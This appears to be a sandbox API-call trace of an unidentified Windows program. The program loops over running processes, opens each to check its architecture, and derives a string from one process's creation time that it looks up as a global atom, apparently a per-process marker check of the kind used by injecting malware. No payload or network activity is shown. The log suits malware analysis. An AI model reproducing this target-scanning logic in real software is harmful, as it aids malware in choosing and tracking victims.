	[0105.066] CloseHandle (hObject=0x694) returned 1
	[0105.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0105.067] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.067] CloseHandle (hObject=0x694) returned 1
	[0105.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0105.067] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.067] CloseHandle (hObject=0x694) returned 1
	[0105.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0105.067] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.067] CloseHandle (hObject=0x694) returned 1
	[0105.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0105.067] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.067] CloseHandle (hObject=0x694) returned 1
	[0105.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0105.067] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.067] CloseHandle (hObject=0x694) returned 1
	[0105.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0105.068] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.068] CloseHandle (hObject=0x694) returned 1
	[0105.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0105.068] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.068] CloseHandle (hObject=0x694) returned 1
	[0105.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0105.068] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.068] CloseHandle (hObject=0x694) returned 1
	[0105.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0105.068] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.068] CloseHandle (hObject=0x694) returned 1
	[0105.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0105.068] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.068] CloseHandle (hObject=0x694) returned 1
	[0105.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0105.069] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.069] CloseHandle (hObject=0x694) returned 1
	[0105.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0105.069] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.069] CloseHandle (hObject=0x694) returned 1
	[0105.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0105.069] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.069] CloseHandle (hObject=0x694) returned 1
	[0105.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0105.069] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.070] CloseHandle (hObject=0x694) returned 1
	[0105.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0105.070] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.070] CloseHandle (hObject=0x694) returned 1
	[0105.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0105.070] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.070] CloseHandle (hObject=0x694) returned 1
	[0105.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0105.070] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.070] CloseHandle (hObject=0x694) returned 1
	[0105.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0105.070] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.070] CloseHandle (hObject=0x694) returned 1
	[0105.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0105.071] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.071] CloseHandle (hObject=0x694) returned 1
	[0105.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.071] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.071] CloseHandle (hObject=0x694) returned 1
	[0105.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.071] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.072] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0105.072] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0105.072] wsprintfA (in: param_1=0x3993498, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0105.072] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.072] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0105.072] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.073] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0105.073] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0105.073] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0105.073] CloseHandle (hObject=0x694) returned 1
	[0105.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0105.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0105.073] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.073] CloseHandle (hObject=0x694) returned 1
	[0105.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0105.073] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.073] CloseHandle (hObject=0x694) returned 1
	[0105.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0105.073] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.073] CloseHandle (hObject=0x694) returned 1
	[0105.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0105.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0105.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0105.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0105.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0105.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0105.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0105.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0105.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0105.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0105.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0105.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0105.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0105.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0105.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0105.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0105.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0105.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0105.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0105.113] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.113] CloseHandle (hObject=0x694) returned 1
	[0105.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0105.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0105.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0105.114] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.114] CloseHandle (hObject=0x694) returned 1
	[0105.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0105.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0105.114] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.114] CloseHandle (hObject=0x694) returned 1
	[0105.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0105.114] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.114] CloseHandle (hObject=0x694) returned 1
	[0105.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0105.115] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.115] CloseHandle (hObject=0x694) returned 1
	[0105.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0105.115] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.115] CloseHandle (hObject=0x694) returned 1
	[0105.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0105.115] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.115] CloseHandle (hObject=0x694) returned 1
	[0105.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0105.115] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.115] CloseHandle (hObject=0x694) returned 1
	[0105.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0105.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0105.116] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.116] CloseHandle (hObject=0x694) returned 1
	[0105.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0105.116] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.116] CloseHandle (hObject=0x694) returned 1
	[0105.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0105.117] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.117] CloseHandle (hObject=0x694) returned 1
	[0105.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0105.117] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.117] CloseHandle (hObject=0x694) returned 1
	[0105.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0105.117] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.117] CloseHandle (hObject=0x694) returned 1
	[0105.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0105.117] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.117] CloseHandle (hObject=0x694) returned 1
	[0105.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0105.117] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.118] CloseHandle (hObject=0x694) returned 1
	[0105.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0105.118] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.118] CloseHandle (hObject=0x694) returned 1
	[0105.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0105.118] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.118] CloseHandle (hObject=0x694) returned 1
	[0105.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0105.118] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.118] CloseHandle (hObject=0x694) returned 1
	[0105.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0105.118] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.118] CloseHandle (hObject=0x694) returned 1
	[0105.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0105.119] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.119] CloseHandle (hObject=0x694) returned 1
	[0105.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0105.119] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.119] CloseHandle (hObject=0x694) returned 1
	[0105.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0105.119] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.119] CloseHandle (hObject=0x694) returned 1
	[0105.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0105.120] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.120] CloseHandle (hObject=0x694) returned 1
	[0105.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0105.120] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.120] CloseHandle (hObject=0x694) returned 1
	[0105.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0105.120] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.120] CloseHandle (hObject=0x694) returned 1
	[0105.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0105.120] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.120] CloseHandle (hObject=0x694) returned 1
	[0105.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0105.120] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.120] CloseHandle (hObject=0x694) returned 1
	[0105.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0105.121] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.121] CloseHandle (hObject=0x694) returned 1
	[0105.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0105.121] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.121] CloseHandle (hObject=0x694) returned 1
	[0105.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0105.121] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.121] CloseHandle (hObject=0x694) returned 1
	[0105.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.121] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.121] CloseHandle (hObject=0x694) returned 1
	[0105.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.122] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.122] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0105.122] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0105.123] wsprintfA (in: param_1=0x3993c40, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0105.123] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.123] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0105.123] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.124] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0105.124] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0105.124] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0105.124] CloseHandle (hObject=0x694) returned 1
	[0105.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0105.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0105.124] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.124] CloseHandle (hObject=0x694) returned 1
	[0105.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0105.124] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.124] CloseHandle (hObject=0x694) returned 1
	[0105.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0105.124] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.125] CloseHandle (hObject=0x694) returned 1
	[0105.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0105.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0105.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0105.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0105.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0105.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0105.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0105.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0105.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0105.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0105.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0105.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0105.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0105.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0105.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0105.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0105.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0105.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0105.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0105.175] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.175] CloseHandle (hObject=0x694) returned 1
	[0105.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0105.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0105.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0105.176] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.176] CloseHandle (hObject=0x694) returned 1
	[0105.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0105.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0105.176] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.176] CloseHandle (hObject=0x694) returned 1
	[0105.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0105.177] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.177] CloseHandle (hObject=0x694) returned 1
	[0105.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0105.177] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.177] CloseHandle (hObject=0x694) returned 1
	[0105.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0105.177] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.177] CloseHandle (hObject=0x694) returned 1
	[0105.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0105.177] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.177] CloseHandle (hObject=0x694) returned 1
	[0105.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0105.178] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.178] CloseHandle (hObject=0x694) returned 1
	[0105.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0105.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0105.178] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.178] CloseHandle (hObject=0x694) returned 1
	[0105.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0105.178] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.178] CloseHandle (hObject=0x694) returned 1
	[0105.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0105.178] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.178] CloseHandle (hObject=0x694) returned 1
	[0105.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0105.178] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.179] CloseHandle (hObject=0x694) returned 1
	[0105.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0105.179] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.179] CloseHandle (hObject=0x694) returned 1
	[0105.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0105.179] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.179] CloseHandle (hObject=0x694) returned 1
	[0105.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0105.179] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.179] CloseHandle (hObject=0x694) returned 1
	[0105.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0105.179] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.179] CloseHandle (hObject=0x694) returned 1
	[0105.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0105.180] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.180] CloseHandle (hObject=0x694) returned 1
	[0105.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0105.180] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.180] CloseHandle (hObject=0x694) returned 1
